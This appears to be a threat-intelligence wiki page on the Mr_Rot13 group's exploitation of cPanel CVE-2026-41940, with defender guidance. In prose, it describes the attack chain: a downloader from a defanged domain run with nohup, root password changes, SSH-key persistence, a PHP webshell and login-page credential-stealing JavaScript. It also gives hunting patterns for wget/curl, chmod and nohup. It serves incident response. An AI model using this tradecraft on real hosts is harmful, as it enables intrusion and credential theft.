Mr_Rot13 cPanel CVE-2026-41940 backdoor campaign

Summary

Mr_Rot13 is QiAnXin XLab's name for a long-running threat cluster exploiting CVE-2026-41940, a critical unauthenticated authentication-bypass vulnerability in cPanel & WHM. XLab says the flaw allows remote attackers to take over affected cPanel / WHM panels without credentials and that, after public disclosure on 2026-04-28, more than 2,000 attacker source IPs were observed participating in automated exploitation and cybercrime activity against the vulnerability.

The durable threat-intelligence value is control-plane takeover of shared-hosting infrastructure. XLab's Mr_Rot13 sample chain turns cPanel compromise into persistent host access by changing passwords, adding SSH keys, planting PHP webshells, injecting credential-harvesting JavaScript into login pages, deploying a cross-platform filemanager remote-control trojan, and reporting credentials/device data to attacker-controlled infrastructure.

Tags

• ops
• operations
• Mr_Rot13
• cPanel
• WHM
• CVE-2026-41940
• active exploitation
• authentication bypass
• control panel compromise
• web hosting
• shared hosting
• backdoor
• webshell
• SSH key persistence
• credential theft
• filemanager
• incident response

Why this matters

• cPanel / WHM is often the administrative root of shared-hosting environments; one panel takeover can expose many sites, databases, mailboxes, deployment secrets, and customer credentials.
• The exploit boundary is severe: XLab describes CVE-2026-41940 as unauthenticated and remotely reachable, with administrator-level panel takeover possible without a password.
• XLab observed broad exploitation by multiple criminal groups, including mining, ransomware, botnet propagation, backdoor implantation, and data theft activity.
• Mr_Rot13's payload is not just a one-shot shell. It layers SSH-key persistence, PHP webshell access, login-page JavaScript theft, password changes, and a remote-control file manager.
• Infrastructure and sample links reach back to at least 2020, suggesting a stable operator with years of low-detection activity rather than a transient opportunistic copycat.

Operational characteristics

• Initial access: exploitation of CVE-2026-41940 against vulnerable cPanel & WHM instances. XLab reports the vulnerability was publicly disclosed on 2026-04-28 and rapidly drew automated exploitation from more than 2,000 source IPs.
• Observed impact: XLab cites a community-disclosed incident involving Southeast Asian government and military institutions where attackers reportedly stole about 4.37 GB of sensitive files after exploiting the vulnerability.
• Downloader stage: the campaign pulled an ELF payload named Update from cp.dene[.]de.com and launched it quietly in the background with nohup.
• Payload family: XLab captured three similar Update builds. The analyzed May 5 build was a stripped, statically linked 64-bit Linux ELF written in Go, with AI-looking Turkish-language log strings and project naming around Payload.
• Persistence and access: the infector changed the root password, installed an SSH public key labeled cpanel-updater, downloaded a PHP webshell named cpanel.py into /usr/local/cpanel/cgi-sys/, and deployed a filemanager remote-control trojan across multiple OS/architecture builds.
• Credential theft: the payload injected JavaScript into cPanel login pages and reported collected credentials and host information to attacker-controlled Telegram / web endpoints.
• Attribution clues: XLab tied the downloader domain, JavaScript C2, and older low-detection PHP backdoor material to wrned[.]com, active since at least 2020. The group name comes from the 0xWR Telegram identity clue and Rot13-obfuscated C2 logic.
• Operator reaction: after an apparent interaction with the attacker's Telegram bot on 2026-05-04, XLab observed the attackers update samples, replace bot tokens, remove the bot from the group, and later re-add it.

Defender heuristics

• Treat any vulnerable or recently exposed cPanel / WHM host as potentially compromised, not merely vulnerable; XLab's telemetry indicates mass exploitation after public disclosure.
• Patch cPanel & WHM to versions that remediate CVE-2026-41940, and restrict WHM/cPanel administration to trusted networks or VPN paths wherever possible.
• Hunt cPanel, web-server, and shell logs for downloads or execution from cp.dene[.]de.com, wpsock[.]com, and wrned[.]com, plus suspicious wget/curl to a root-owned temporary file followed by chmod and nohup.
• Inspect /usr/local/cpanel/cgi-sys/ and adjacent cPanel CGI/plugin paths for unexpected Python/PHP webshells such as cpanel.py, adminer.php, or files created near the exploitation window.
• Review /root/.ssh/authorized_keys, privileged user passwords, cron/systemd persistence, cPanel login templates, and JavaScript served by panel login pages for unauthorized additions.
• Search for unexpected filemanager binaries or architecture-specific payload names on Linux, Windows, and macOS hosts used for hosting administration.
• Preserve /var/cpanel/logs, /usr/local/cpanel/logs, authentication logs, shell history, process listings, web roots, cPanel plugin files, and memory/process evidence before cleanup.
• After confirmed compromise, rotate WHM/cPanel credentials, root passwords, SSH keys, database credentials, mail credentials, deployment tokens, CMS secrets, API keys, and any customer/site secrets reachable from the hosting node.

Related pages

• LiteSpeed cPanel CVE-2026-48172 exploitation
• Ghost CMS CVE-2026-26980 ClickFix poisoning
• Drupal Core CVE-2026-9082 exploitation
• ConnectWise ScreenConnect exploitation wave

Sources

• QiAnXin XLab: https://blog.xlab.qianxin.com/mr_rot13-the-elusive-6-year-hacker-group-weaponizing-critical-cpanel-flaws-for-backdoor-deployment/
• CVE record: https://www.cve.org/CVERecord?id=CVE-2026-41940